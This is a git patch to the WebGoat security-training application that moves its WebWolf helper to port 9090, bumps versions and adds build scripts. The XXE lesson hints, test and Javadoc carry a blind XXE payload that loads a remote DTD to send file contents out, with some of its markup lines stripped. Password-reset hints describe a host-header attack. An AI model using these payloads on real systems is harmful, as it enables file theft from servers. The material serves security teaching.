From ecb7688e08c71e86b53ff0fecc31de062cdc60e0 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Wed, 30 May 2018 13:17:05 +0200 Subject: [PATCH] Update to new version for develop Move WebWolf to port 9090 easier since most of the time something is running on 8081 Add scripts for easy building Docker files etc --- docker-compose-postgres.yml | 3 +- docker-compose.yml | 3 +- pom.xml | 27 +++++++++------- scripts/build-all.sh | 32 +++++++++++++++++++ scripts/build_docker.sh | 10 ++++++ scripts/clean-run-docker-compose.sh | 5 +++ scripts/run-docker-compose.sh | 4 +++ webgoat-container/pom.xml | 2 +- .../src/main/resources/application.properties | 2 +- webgoat-images/vagrant-training/Vagrantfile | 2 +- webgoat-lessons/auth-bypass/pom.xml | 2 +- webgoat-lessons/bypass-restrictions/pom.xml | 2 +- webgoat-lessons/challenge/pom.xml | 2 +- webgoat-lessons/client-side-filtering/pom.xml | 2 +- webgoat-lessons/cross-site-scripting/pom.xml | 2 +- webgoat-lessons/csrf/pom.xml | 2 +- webgoat-lessons/html-tampering/pom.xml | 2 +- webgoat-lessons/http-basics/pom.xml | 2 +- webgoat-lessons/http-proxies/pom.xml | 2 +- webgoat-lessons/idor/pom.xml | 2 +- .../insecure-deserialization/pom.xml | 2 +- webgoat-lessons/insecure-login/pom.xml | 2 +- webgoat-lessons/jwt/pom.xml | 2 +- webgoat-lessons/missing-function-ac/pom.xml | 2 +- webgoat-lessons/password-reset/pom.xml | 2 +- .../webgoat/plugin/ResetLinkAssignment.java | 2 +- .../resources/i18n/WebGoatLabels.properties | 2 +- webgoat-lessons/pom.xml | 4 +-- webgoat-lessons/sql-injection/pom.xml | 2 +- webgoat-lessons/vulnerable-components/pom.xml | 2 +- webgoat-lessons/webgoat-introduction/pom.xml | 2 +- webgoat-lessons/webwolf-introduction/pom.xml | 2 +- .../lessonPlans/en/IntroductionWebWolf.adoc | 9 ++++-- webgoat-lessons/xxe/pom.xml | 2 +- .../plugin/BlindSendFileAssignment.java | 8 ++--- .../resources/i18n/WebGoatLabels.properties | 2 +- .../xxe/src/main/resources/images/example.dtd | 5 ++- .../plugin/BlindSendFileAssignmentTest.java | 6 ++-- webgoat-server/Dockerfile | 2 +- webgoat-server/pom.xml | 2 +- webwolf/Dockerfile | 6 ++-- webwolf/README.md | 4 +-- webwolf/pom.xml | 2 +- .../java/org/owasp/webwolf/FileServer.java | 6 ++++ .../src/main/resources/application.properties | 4 +-- .../src/main/resources/templates/files.html | 4 +-- 46 files changed, 131 insertions(+), 67 deletions(-) create mode 100644 scripts/build-all.sh create mode 100644 scripts/build_docker.sh create mode 100644 scripts/clean-run-docker-compose.sh create mode 100644 scripts/run-docker-compose.sh diff --git a/docker-compose-postgres.yml b/docker-compose-postgres.yml index 7ecc68403..919cbd509 100644 --- a/docker-compose-postgres.yml +++ b/docker-compose-postgres.yml @@ -6,6 +6,7 @@ services: user: webgoat environment: - WEBWOLF_HOST=webwolf + - WEBWOLF_PORT=9090 - spring.datasource.url=jdbc:postgresql://webgoat_db:5432/webgoat - spring.datasource.username=webgoat - spring.datasource.password=webgoat @@ -22,7 +23,7 @@ services: - spring.datasource.driver-class-name=org.postgresql.Driver - spring.jpa.properties.hibernate.dialect=org.hibernate.dialect.PostgreSQL94Dialect ports: - - "8081:8081" + - "9090:9090" db: container_name: webgoat_db image: postgres:latest diff --git a/docker-compose.yml b/docker-compose.yml index 8d2bcdee3..725195504 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -5,6 +5,7 @@ services: image: webgoat/webgoat-8.0 environment: - WEBWOLF_HOST=webwolf + - WEBWOLF_PORT=9090 - spring.datasource.url=jdbc:hsqldb:hsql://webgoat_db:9001/webgoat ports: - "8080:8080" @@ -15,7 +16,7 @@ services: environment: - spring.datasource.url=jdbc:hsqldb:hsql://webgoat_db:9001/webgoat ports: - - "8081:8081" + - "9090:9090" depends_on: - db db: diff --git a/pom.xml b/pom.xml index ca4c1caf8..206ecb2ed 100644 --- a/pom.xml +++ b/pom.xml @@ -1,11 +1,12 @@ - + 4.0.0 org.owasp.webgoat webgoat-parent pom - v8.0.0.M15 + v8.0.0.SNAPSHOT WebGoat Parent Pom Parent Pom for the WebGoat Project. A deliberately insecure Web Application @@ -53,17 +54,17 @@ jwayman Jeff Wayman - + dcowden Dave Cowden - + lawson89 Richard Lawson - + dougmorato @@ -92,8 +93,8 @@ https://github.com/WebGoat/WebGoat scm:git:git@github.com:WebGoat/WebGoat.git scm:git:git@github.com:WebGoat/WebGoat.git - HEAD - + HEAD + Github Issues @@ -202,7 +203,7 @@ release - + org.owasp.webgoat.lesson dist @@ -214,7 +215,7 @@ - + org.apache.maven.plugins maven-dependency-plugin @@ -225,7 +226,9 @@ generate-resources - ${project.basedir}/webgoat-container/src/main/webapp/plugin_lessons + + ${project.basedir}/webgoat-container/src/main/webapp/plugin_lessons + dist *.jar @@ -324,7 +327,7 @@ coveralls-maven-plugin ${coveralls-maven-plugin.version} - + @@ -332,7 +335,7 @@ cobertura-maven-plugin ${cobertura-maven-plugin.version} - + xml 256m diff --git a/scripts/build-all.sh b/scripts/build-all.sh new file mode 100644 index 000000000..a4430802e --- /dev/null +++ b/scripts/build-all.sh @@ -0,0 +1,32 @@ +#!/usr/bin/env bash + +cd .. + +nc -zv 127.0.0.1 8080 2>/dev/null +SUCCESS=$? +nc -zv 127.0.0.1 9090 2>/dev/null +SUCCESS=${SUCCESS}$? + +if [[ "${SUCCESS}" -eq 00 ]] ; then + echo "WebGoat and or WebWolf are still running, please stop them first otherwise unit tests might fail!" + exit 127 +fi + + +#mvn clean install +#if [[ "$?" -ne 0 ]] ; then +# exit y$? +#fi + +cd - +sh build_docker.sh + +echo "Do you want to run docker-compose?" +while true; do + read -p "Do you want to run docker-compose?" yn + case ${yn} in + [Yy]* ) sh clean-run-docker-compose.sh; break;; + [Nn]* ) exit;; + * ) echo "Please answer yes or no.";; + esac +done \ No newline at end of file diff --git a/scripts/build_docker.sh b/scripts/build_docker.sh new file mode 100644 index 000000000..f63329476 --- /dev/null +++ b/scripts/build_docker.sh @@ -0,0 +1,10 @@ +#!/bin/bash + +WEBGOAT_HOME=$(pwd)/../ + +cd ${WEBGOAT_HOME}/webgoat-server +docker build -t webgoat/webgoat-8.0 . + +cd ${WEBGOAT_HOME}/webwolf +docker build -t webgoat/webwolf . + diff --git a/scripts/clean-run-docker-compose.sh b/scripts/clean-run-docker-compose.sh new file mode 100644 index 000000000..c804d8d36 --- /dev/null +++ b/scripts/clean-run-docker-compose.sh @@ -0,0 +1,5 @@ +#!/usr/bin/env bash + +cd .. +docker-compose rm -f +docker-compose up diff --git a/scripts/run-docker-compose.sh b/scripts/run-docker-compose.sh new file mode 100644 index 000000000..4ed58bcf0 --- /dev/null +++ b/scripts/run-docker-compose.sh @@ -0,0 +1,4 @@ +#!/usr/bin/env bash + +cd .. +docker-compose up diff --git a/webgoat-container/pom.xml b/webgoat-container/pom.xml index 3894d0869..11edb880f 100644 --- a/webgoat-container/pom.xml +++ b/webgoat-container/pom.xml @@ -10,7 +10,7 @@ org.owasp.webgoat webgoat-parent - v8.0.0.M15 + v8.0.0.SNAPSHOT diff --git a/webgoat-container/src/main/resources/application.properties b/webgoat-container/src/main/resources/application.properties index 6ccb8fa93..ba8b75afc 100644 --- a/webgoat-container/src/main/resources/application.properties +++ b/webgoat-container/src/main/resources/application.properties @@ -37,7 +37,7 @@ webgoat.database.connection.string=jdbc:hsqldb:mem:{USER} webgoat.default.language=en webwolf.host=${WEBWOLF_HOST:localhost} -webwolf.port=${WEBWOLF_PORT:8081} +webwolf.port=${WEBWOLF_PORT:9090} webwolf.url=http://${webwolf.host}:${webwolf.port}/WebWolf webwolf.url.landingpage=http://${webwolf.host}:${webwolf.port}/landing webwolf.url.mail=http://${webwolf.host}:${webwolf.port}/mail diff --git a/webgoat-images/vagrant-training/Vagrantfile b/webgoat-images/vagrant-training/Vagrantfile index ec6bc9b25..4772a8904 100644 --- a/webgoat-images/vagrant-training/Vagrantfile +++ b/webgoat-images/vagrant-training/Vagrantfile @@ -3,7 +3,7 @@ Vagrant.configure(2) do |config| config.vm.box = "ubuntu/trusty64" config.vm.network :forwarded_port, guest: 8080, host: 8080 - config.vm.network :forwarded_port, guest: 8081, host: 8081 + config.vm.network :forwarded_port, guest: 9090, host: 9090 config.vm.provider "virtualbox" do |vb| vb.gui = false vb.memory = "4096" diff --git a/webgoat-lessons/auth-bypass/pom.xml b/webgoat-lessons/auth-bypass/pom.xml index 2e63e366a..6e63139a2 100644 --- a/webgoat-lessons/auth-bypass/pom.xml +++ b/webgoat-lessons/auth-bypass/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M15 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/bypass-restrictions/pom.xml b/webgoat-lessons/bypass-restrictions/pom.xml index 4e8455ae4..29f56754c 100755 --- a/webgoat-lessons/bypass-restrictions/pom.xml +++ b/webgoat-lessons/bypass-restrictions/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M15 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/challenge/pom.xml b/webgoat-lessons/challenge/pom.xml index 69db4dd4d..b8f9144c9 100644 --- a/webgoat-lessons/challenge/pom.xml +++ b/webgoat-lessons/challenge/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M15 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/client-side-filtering/pom.xml b/webgoat-lessons/client-side-filtering/pom.xml index b60276ec5..485e42b76 100644 --- a/webgoat-lessons/client-side-filtering/pom.xml +++ b/webgoat-lessons/client-side-filtering/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M15 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/cross-site-scripting/pom.xml b/webgoat-lessons/cross-site-scripting/pom.xml index 86709473c..b8c1021ff 100644 --- a/webgoat-lessons/cross-site-scripting/pom.xml +++ b/webgoat-lessons/cross-site-scripting/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M15 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/csrf/pom.xml b/webgoat-lessons/csrf/pom.xml index e11a77edd..cc8d429c5 100644 --- a/webgoat-lessons/csrf/pom.xml +++ b/webgoat-lessons/csrf/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M15 + v8.0.0.SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/html-tampering/pom.xml b/webgoat-lessons/html-tampering/pom.xml index ec3f51ffe..2c7fe60c0 100755 --- a/webgoat-lessons/html-tampering/pom.xml +++ b/webgoat-lessons/html-tampering/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M15 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/http-basics/pom.xml b/webgoat-lessons/http-basics/pom.xml index d70f14823..9fdf8d13b 100644 --- a/webgoat-lessons/http-basics/pom.xml +++ b/webgoat-lessons/http-basics/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M15 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/http-proxies/pom.xml b/webgoat-lessons/http-proxies/pom.xml index 42810af9b..a78c58090 100644 --- a/webgoat-lessons/http-proxies/pom.xml +++ b/webgoat-lessons/http-proxies/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M15 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/idor/pom.xml b/webgoat-lessons/idor/pom.xml index 1ff614abb..6620f6920 100644 --- a/webgoat-lessons/idor/pom.xml +++ b/webgoat-lessons/idor/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M15 + v8.0.0.SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/insecure-deserialization/pom.xml b/webgoat-lessons/insecure-deserialization/pom.xml index 70dc18780..68a95c885 100755 --- a/webgoat-lessons/insecure-deserialization/pom.xml +++ b/webgoat-lessons/insecure-deserialization/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M15 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/insecure-login/pom.xml b/webgoat-lessons/insecure-login/pom.xml index 4e2efea24..ed6bd358e 100755 --- a/webgoat-lessons/insecure-login/pom.xml +++ b/webgoat-lessons/insecure-login/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M15 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/jwt/pom.xml b/webgoat-lessons/jwt/pom.xml index cc52fc036..ec6861190 100644 --- a/webgoat-lessons/jwt/pom.xml +++ b/webgoat-lessons/jwt/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M15 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/missing-function-ac/pom.xml b/webgoat-lessons/missing-function-ac/pom.xml index 903bf96b8..8b266b4c2 100644 --- a/webgoat-lessons/missing-function-ac/pom.xml +++ b/webgoat-lessons/missing-function-ac/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M15 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/password-reset/pom.xml b/webgoat-lessons/password-reset/pom.xml index 2835a7523..5e78f3b0e 100644 --- a/webgoat-lessons/password-reset/pom.xml +++ b/webgoat-lessons/password-reset/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M15 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/plugin/ResetLinkAssignment.java b/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/plugin/ResetLinkAssignment.java index 99eb8c41e..39254d783 100644 --- a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/plugin/ResetLinkAssignment.java +++ b/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/plugin/ResetLinkAssignment.java @@ -62,7 +62,7 @@ public class ResetLinkAssignment extends AssignmentEndpoint { resetLinks.add(resetLink); String host = request.getHeader("host"); if (org.springframework.util.StringUtils.hasText(email)) { - if (email.equals(TOM_EMAIL) && host.contains("8081")) { //User indeed changed the host header. + if (email.equals(TOM_EMAIL) && host.contains("9090")) { //User indeed changed the host header. userToTomResetLink.put(getWebSession().getUserName(), resetLink); fakeClickingLinkEmail(host, resetLink); } else { diff --git a/webgoat-lessons/password-reset/src/main/resources/i18n/WebGoatLabels.properties b/webgoat-lessons/password-reset/src/main/resources/i18n/WebGoatLabels.properties index 3b3f6bb69..709165e15 100644 --- a/webgoat-lessons/password-reset/src/main/resources/i18n/WebGoatLabels.properties +++ b/webgoat-lessons/password-reset/src/main/resources/i18n/WebGoatLabels.properties @@ -15,7 +15,7 @@ password-reset-not-solved=Sorry but you did not redirect the reset link to WebWo password-reset-hint1=Try to send a password reset link to your own account at {user}@webgoat.org, you can read this e-mail in WebWolf. password-reset-hint2=Look at the link, can you think how the server creates this link? password-reset-hint3=Tom clicks all the links he receives in his mailbox, you can use the landing page in WebWolf to get the reset link... -password-reset-hint4=The link points to localhost:8080/PasswordReset/.... can you change the host to localhost:8081 +password-reset-hint4=The link points to localhost:8080/PasswordReset/.... can you change the host to localhost:9090 password-reset-hint5=Intercept the request and change the host header login_failed=Login failed login_failed.tom=Sorry only Tom can login at the moment \ No newline at end of file diff --git a/webgoat-lessons/pom.xml b/webgoat-lessons/pom.xml index 94903db5d..e5f66efdf 100644 --- a/webgoat-lessons/pom.xml +++ b/webgoat-lessons/pom.xml @@ -5,12 +5,12 @@ org.owasp.webgoat.lesson webgoat-lessons-parent pom - v8.0.0.M15 + v8.0.0.SNAPSHOT org.owasp.webgoat webgoat-parent - v8.0.0.M15 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/sql-injection/pom.xml b/webgoat-lessons/sql-injection/pom.xml index 8e02035d3..46677291d 100644 --- a/webgoat-lessons/sql-injection/pom.xml +++ b/webgoat-lessons/sql-injection/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M15 + v8.0.0.SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/vulnerable-components/pom.xml b/webgoat-lessons/vulnerable-components/pom.xml index 343969ac3..df1c57c62 100644 --- a/webgoat-lessons/vulnerable-components/pom.xml +++ b/webgoat-lessons/vulnerable-components/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M15 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/webgoat-introduction/pom.xml b/webgoat-lessons/webgoat-introduction/pom.xml index 4d7b403f8..d4e2db171 100644 --- a/webgoat-lessons/webgoat-introduction/pom.xml +++ b/webgoat-lessons/webgoat-introduction/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M15 + v8.0.0.SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/webwolf-introduction/pom.xml b/webgoat-lessons/webwolf-introduction/pom.xml index 7f0903586..22745b96a 100644 --- a/webgoat-lessons/webwolf-introduction/pom.xml +++ b/webgoat-lessons/webwolf-introduction/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M15 + v8.0.0.SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc b/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc index 0bbd39bc1..bf15f54c3 100644 --- a/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc +++ b/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc @@ -27,21 +27,24 @@ WebWolf runs as a separate web application and is started automatically when usi are not using the Docker image you will need to download the jar file and start it: ``` -java -jar webwolf-<>.jar +java -jar webwolf-<>.jar [--server.port=9090] [--server.address=localhost] ``` +By default WebWolf starts on port 9090 with `--server.port` you can specify a different port. With `server.address` you +can bind it to a different address (default localhost) + WebWolf is also available as a Docker container, because it shares the database with WebGoat we first need to find out the ip address of the Docker container. ``` WEBGOAT_SERVER_ADDRESS=$(docker inspect -f "{{ .NetworkSettings.IPAddress }}" `docker ps | grep webgoat | awk '{print $1}'`) docker pull webgoat/webwolf -docker run -e webgoat.server.address=${WEBGOAT_SERVER_ADDRESS} -it -p 8081:8081 webgoat/webwolf /home/webwolf/run.sh +docker run -e webgoat.server.address=${WEBGOAT_SERVER_ADDRESS} -it -p 9090:9090 webgoat/webwolf /home/webwolf/run.sh ``` Note: if you start WebGoat as standalone application you need to start WebWolf as standalone application as well. If you start WebGoat as Docker container you need to start WebWolf as Docker container as well. -This will start the application on port 8081, click webWolfLink:here[] to open WebWolf. +This will start the application on port 9090, click webWolfLink:here[] to open WebWolf. First thing you need to do is register a new user within WebWolf. \ No newline at end of file diff --git a/webgoat-lessons/xxe/pom.xml b/webgoat-lessons/xxe/pom.xml index 6d6eae1e6..781f2cc36 100644 --- a/webgoat-lessons/xxe/pom.xml +++ b/webgoat-lessons/xxe/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M15 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/BlindSendFileAssignment.java b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/BlindSendFileAssignment.java index 9f48290cf..dd823e1ca 100644 --- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/BlindSendFileAssignment.java +++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/BlindSendFileAssignment.java @@ -89,7 +89,7 @@ public class BlindSendFileAssignment extends AssignmentEndpoint { /** + %remote; ]> test&send; @@ -102,14 +102,14 @@ public class BlindSendFileAssignment extends AssignmentEndpoint { * 
      *     
      *     
-     *     ">
+     *     ">
      *      %all;
      *
* * This will be reduced to: * * 
-     *     
+     *     
      *
* * Wire it all up in the xml send to the server: @@ -117,7 +117,7 @@ public class BlindSendFileAssignment extends AssignmentEndpoint { * 
      *  
      *  
+     *  
      *  %remote;
      *   ]>
      *  
diff --git a/webgoat-lessons/xxe/src/main/resources/i18n/WebGoatLabels.properties b/webgoat-lessons/xxe/src/main/resources/i18n/WebGoatLabels.properties
index 9af5a6300..766440f01 100644
--- a/webgoat-lessons/xxe/src/main/resources/i18n/WebGoatLabels.properties
+++ b/webgoat-lessons/xxe/src/main/resources/i18n/WebGoatLabels.properties
@@ -43,4 +43,4 @@ xxe.blind.hints.1=This assignment is more complicated you need to upload the con
 xxe.blind.hints.2=In this case you cannot combine external entities in combination with internal entities.
 xxe.blind.hints.3=Use parameter entities to perform the attack, see for example: https://www.acunetix.com/blog/articles/xml-external-entity-xxe-limitations/
 xxe.blind.hints.4=An example DTD can be found here WebGoat/images/example.dtd, include this DTD in the xml comment
-xxe.blind.hints.5=Use for the comment, be aware to replace the url accordingly: <?xml version="1.0"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM "http://localhost:8081/files/test1234/test.dtd">%remote;]><comment><text>test&send;</text></comment>
+xxe.blind.hints.5=Use for the comment, be aware to replace the url accordingly: <?xml version="1.0"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM "http://localhost:9090/files/test1234/test.dtd">%remote;]><comment><text>test&send;</text></comment>
diff --git a/webgoat-lessons/xxe/src/main/resources/images/example.dtd b/webgoat-lessons/xxe/src/main/resources/images/example.dtd
index 9753b5c2f..76be6d7c6 100644
--- a/webgoat-lessons/xxe/src/main/resources/images/example.dtd
+++ b/webgoat-lessons/xxe/src/main/resources/images/example.dtd
@@ -1,5 +1,4 @@
 
 
-">
-%all;
-        ~
\ No newline at end of file
+">
+%all;
\ No newline at end of file
diff --git a/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/BlindSendFileAssignmentTest.java b/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/BlindSendFileAssignmentTest.java
index 4efbca7c4..621fdd1b3 100644
--- a/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/BlindSendFileAssignmentTest.java
+++ b/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/BlindSendFileAssignmentTest.java
@@ -37,7 +37,7 @@ public class BlindSendFileAssignmentTest extends LessonTest {
     private String webGoatHomeDirectory;
 
     @Rule
-    public WireMockRule webwolfServer = new WireMockRule(8081);
+    public WireMockRule webwolfServer = new WireMockRule(9090);
 
     @Before
     public void setup() throws Exception {
@@ -74,7 +74,7 @@ public class BlindSendFileAssignmentTest extends LessonTest {
         //Host DTD on WebWolf site
         String dtd = "\n" +
                 "\n" +
-                "\">\n" +
+                "\">\n" +
                 "%all;";
         webwolfServer.stubFor(get(WireMock.urlMatching("/files/test.dtd"))
                 .willReturn(aResponse()
@@ -85,7 +85,7 @@ public class BlindSendFileAssignmentTest extends LessonTest {
         //Make the request from WebGoat
         String xml = "" +
                 "" +
+                "" +
                 "%remote;" +
                 "]>" +
                 "test&send;";
diff --git a/webgoat-server/Dockerfile b/webgoat-server/Dockerfile
index 860bb1b3f..85562dba0 100644
--- a/webgoat-server/Dockerfile
+++ b/webgoat-server/Dockerfile
@@ -1,6 +1,6 @@
 FROM openjdk:8-jre-slim
 
-ARG webgoat_version=8.0-SNAPSHOT
+ARG webgoat_version=v8.0.0.SNAPSHOT
 
 RUN \
   apt-get update && apt-get install && \
diff --git a/webgoat-server/pom.xml b/webgoat-server/pom.xml
index 452985378..af9f6c6c1 100644
--- a/webgoat-server/pom.xml
+++ b/webgoat-server/pom.xml
@@ -6,7 +6,7 @@
     
         org.owasp.webgoat
         webgoat-parent
-        v8.0.0.M15
+        v8.0.0.SNAPSHOT
     
 
     
diff --git a/webwolf/Dockerfile b/webwolf/Dockerfile
index a591b2ae5..060f6ee9a 100644
--- a/webwolf/Dockerfile
+++ b/webwolf/Dockerfile
@@ -1,6 +1,6 @@
 FROM openjdk:8-jre-slim
 
-ARG webwolf_version=8.0-SNAPSHOT
+ARG webwolf_version=v8.0.0.SNAPSHOT
 
 RUN \
   apt-get update && apt-get install && \
@@ -9,6 +9,6 @@ RUN \
 USER webwolf
 COPY target/webwolf-${webwolf_version}.jar /home/webwolf/webwolf.jar
 
-ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/./urandom", "-jar", "/home/webwolf/webwolf.jar", "--server.address=0.0.0.0"]
+ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/./urandom", "-jar", "/home/webwolf/webwolf.jar", "--server.port=9090", "--server.address=0.0.0.0"]
 
-EXPOSE 8081
+EXPOSE 9090
diff --git a/webwolf/README.md b/webwolf/README.md
index 4086c268c..52d5341c8 100644
--- a/webwolf/README.md
+++ b/webwolf/README.md
@@ -21,7 +21,7 @@ At the moment WebWolf offers support for:
 ## 1. Run using Docker
 
 If you use the Docker image of WebGoat this application will automatically be available. Use the following 
-URL: http://localhost:8081/WebWolf
+URL: http://localhost:9090/WebWolf
 
 ## 2. Standalone
 
@@ -36,7 +36,7 @@ Now we are ready to run the project. WebGoat 8.x is using Spring-Boot.
 ```Shell
 mvn -pl webwolf spring-boot:run
 ```
-... you should be running WebWolf on localhost:8081/WebWolf momentarily
+... you should be running WebWolf on localhost:9090/WebWolf momentarily
 
 
 
diff --git a/webwolf/pom.xml b/webwolf/pom.xml
index e68d7163c..bc2d30f0a 100644
--- a/webwolf/pom.xml
+++ b/webwolf/pom.xml
@@ -6,7 +6,7 @@
     
         org.owasp.webgoat
         webgoat-parent
-        v8.0.0.M15
+        v8.0.0.SNAPSHOT
     
 
     
diff --git a/webwolf/src/main/java/org/owasp/webwolf/FileServer.java b/webwolf/src/main/java/org/owasp/webwolf/FileServer.java
index d386235a0..8adaa1f3d 100644
--- a/webwolf/src/main/java/org/owasp/webwolf/FileServer.java
+++ b/webwolf/src/main/java/org/owasp/webwolf/FileServer.java
@@ -32,6 +32,11 @@ public class FileServer {
 
     @Value("${webwolf.fileserver.location}")
     private String fileLocatation;
+    @Value("${server.address}")
+    private String server;
+    @Value("${server.port}")
+    private int port;
+
 
     @PostMapping(value = "/WebWolf/fileupload")
     @SneakyThrows
@@ -84,6 +89,7 @@ public class FileServer {
         }
 
         modelAndView.addObject("files", uploadedFiles);
+        modelAndView.addObject("webwolf_url", "http://" + server +":" + port);
         return modelAndView;
     }
 }
diff --git a/webwolf/src/main/resources/application.properties b/webwolf/src/main/resources/application.properties
index 421665f81..25869712a 100644
--- a/webwolf/src/main/resources/application.properties
+++ b/webwolf/src/main/resources/application.properties
@@ -2,8 +2,8 @@ server.error.include-stacktrace=always
 server.error.path=/error.html
 server.session.timeout=6000
 #server.contextPath=/WebWolf
-server.port=8081
-server.address=127.0.0.1
+server.port=9090
+server.address=localhost
 server.session.cookie.name = WEBWOLFSESSION
 
 spring.datasource.url=jdbc:hsqldb:hsql://${webgoat.server.address:localhost}:9001/webgoat
diff --git a/webwolf/src/main/resources/templates/files.html b/webwolf/src/main/resources/templates/files.html
index 0cd43e95e..b3bcde29c 100644
--- a/webwolf/src/main/resources/templates/files.html
+++ b/webwolf/src/main/resources/templates/files.html
@@ -20,7 +20,7 @@
         

         

             Each file will be available under the following url:
-            http://localhost:8081/files/{username}/{filename}.
+            http://localhost:9090//files/{username}/{filename}.
         

         

             You can copy and paste the location from the table below.
@@ -33,7 +33,7 @@
         
         

 
-            
+